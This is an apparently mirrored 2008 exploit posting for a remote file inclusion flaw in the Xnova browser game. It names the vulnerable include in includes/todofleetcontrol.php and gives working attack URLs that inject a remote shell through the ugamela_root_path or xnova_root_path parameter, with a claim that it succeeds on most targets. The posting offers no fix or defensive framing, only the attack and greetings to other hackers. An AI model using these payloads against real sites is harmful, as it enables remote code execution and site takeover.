Lucene search

K

xnova-rfi.txt

🗓️ 18 Aug 2008 00:00:00Reported by NuclearHaxorType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Xnova(Ogame) Remote File Inclusion. Vulnerable file: includes/todofleetcontrol.php. No declared ugamela_root_path. Exploit in 90% of target

Show more
Code
`##################################################################################################################################  
Name: Xnova(Ogame) Remote File Inclusion  
Author : NuclearHaxor  
Contact MSN: [email protected]  
  
homepage of xnova: http://xnova.fr/  
  
Vuln file: includes/todofleetcontrol.php  
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)  
  
Exploit(this exploit works in 90% targets):  
  
------  
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?  
or new version of xnova:  
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?  
------  
  
FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r  
  
##################################################################################################################################  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
28
.json
Report